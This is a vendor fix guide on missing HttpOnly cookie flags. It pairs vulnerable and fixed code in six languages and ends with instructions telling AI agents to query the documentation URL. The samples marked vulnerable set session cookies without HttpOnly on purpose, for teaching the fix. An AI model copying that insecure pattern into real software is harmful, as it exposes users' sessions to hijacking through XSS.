# HttpOnly Cookie Vulnerabilities
#### Tools recognizing this:
Opengrep Fortify Checkmarx SonarQube Snyk Semgrep CodeQL
## What is HttpOnly Cookie and Why is it Important?
The HttpOnly flag is a security feature that helps prevent client-side access to cookie data through JavaScript. When a cookie is set with the HttpOnly flag, it becomes inaccessible to client-side scripting languages like JavaScript, helping protect against Cross-Site Scripting (XSS) attacks.
Without the HttpOnly flag, cookies are vulnerable to:
* Theft through XSS attacks
* Session hijacking
* Unauthorized access to sensitive cookie data
* Client-side manipulation of cookie values
This guide covers HttpOnly cookie vulnerabilities, examples, prevention methods, and how to properly secure cookies in your applications.
## One Simple HttpOnly Cookie Vulnerability Example
Consider this basic example of setting a cookie:
{% code overflow="wrap" %}
```
Cookie cookie = new Cookie("sessionId", sessionValue);
response.addCookie(cookie);
```
{% endcode %}
An attacker exploiting an XSS vulnerability could steal this cookie using JavaScript:
``
The cookie data would be accessible because the HttpOnly flag is not set, allowing the attacker to hijack the user's session.
## HttpOnly Cookie Prevention Methods: How to Fix Your Code
The most effective way to fix HttpOnly cookie vulnerabilities is to explicitly set the HttpOnly flag when creating cookies. This ensures that the cookie cannot be accessed through client-side scripts, providing an additional layer of security against XSS attacks.
### Code Samples
{% tabs %}
{% tab title="Java" %}
**Vulnerable Code**
Cookie cookie = new Cookie("sessionId", sessionValue);
response.addCookie(cookie);
**Fixed Code**
```java
Cookie cookie = new Cookie("sessionId", sessionValue);
cookie.setHttpOnly(true);
response.addCookie(cookie);
```
**Fix Explanation**
The vulnerable code creates a cookie without the HttpOnly flag.The fix explicitly sets the HttpOnly flag using setHttpOnly(true).This prevents JavaScript access to the cookie.The cookie becomes more resistant to XSS attacks.
{% endtab %}
{% tab title="JavaScript" %}
**Vulnerable Code**
```javascript
res.cookie('sessionId', sessionValue, {
secure: true,
maxAge: 3600000
});
```
**Fixed Code**
```javascript
res.cookie('sessionId', sessionValue, {
secure: true,
httpOnly: true,
maxAge: 3600000
});
```
**Fix Explanation**
The vulnerable code sets a cookie without the HttpOnly flag.The fix adds the httpOnly option to the cookie configuration.This prevents client-side JavaScript from accessing the cookie.The cookie becomes more secure against XSS attacks.
{% endtab %}
{% tab title="Python" %}
**Vulnerable Code**
```python
response.set_cookie('sessionId', session_value,
secure=True,
max_age=3600
)
```
**Fixed Code**
```python
response.set_cookie('sessionId', session_value,
secure=True,
httponly=True,
max_age=3600
)
```
**Fix Explanation**
The vulnerable code creates a cookie without the HttpOnly flag.The fix adds the httponly parameter set to True.This prevents JavaScript from accessing the cookie.The cookie becomes protected against client-side script access.
{% endtab %}
{% tab title="C#" %}
**Vulnerable Code**
```csharp
HttpCookie cookie = new HttpCookie("sessionId", sessionValue);
Response.Cookies.Add(cookie);
```
**Fixed Code**
```csharp
HttpCookie cookie = new HttpCookie("sessionId", sessionValue);
cookie.HttpOnly = true;
Response.Cookies.Add(cookie);
```
**Fix Explanation**
The vulnerable code creates a cookie without the HttpOnly property.The fix sets the HttpOnly property to true.This prevents client-side access to the cookie.The cookie becomes more secure against XSS attacks.
{% endtab %}
{% tab title="PHP" %}
**Vulnerable Code**
```php
setcookie("sessionId", $sessionValue,
time() + 3600,
"/",
"example.com",
true
);
```
**Fixed Code**
```php
setcookie("sessionId", $sessionValue,
time() + 3600,
"/",
"example.com",
true,
true
);
```
**Fix Explanation**
The vulnerable code sets a cookie without the HttpOnly flag.The fix adds true as the last parameter to enable HttpOnly.This prevents JavaScript access to the cookie.The cookie becomes protected against client-side access.
{% endtab %}
{% tab title="Ruby" %}
**Vulnerable Code**
```ruby
cookies[:session_id] = {
value: session_value,
expires: 1.hour.from_now,
secure: true
}
```
**Fixed Code**
```ruby
cookies[:session_id] = {
value: session_value,
expires: 1.hour.from_now,
secure: true,
httponly: true
}
```
**Fix Explanation**
The vulnerable code creates a cookie without the HttpOnly flag.The fix adds the httponly: true option to the cookie.This prevents JavaScript from accessing the cookie.The cookie becomes more secure against XSS attacks.
{% endtab %}
{% endtabs %}
## Need more help in preventing HttpOnly Cookie vulnerabilities?
[Mobb](https://mobb.ai) supports fixing many forms of HttpOnly Cookie vulnerabilities, and can mitigate your issues in batch.
Start now for free at [app.mobb.ai](https://app.mobb.ai)
### We'd love your feedback!
We're excited to hear your thoughts and ideas about fixing vulnerabilities.
[Book a meeting](https://calendly.com/mobbai/demo) or [Contact us](https://content.mobb.ai/contact) if you have any corrections, questions or suggestions. Start now for free at
[^1]: This is the vulnerable part
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://docs.mobb.ai/mobb-user-docs/fixing-guides/cookie-is-not-httponly-fix-guide.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.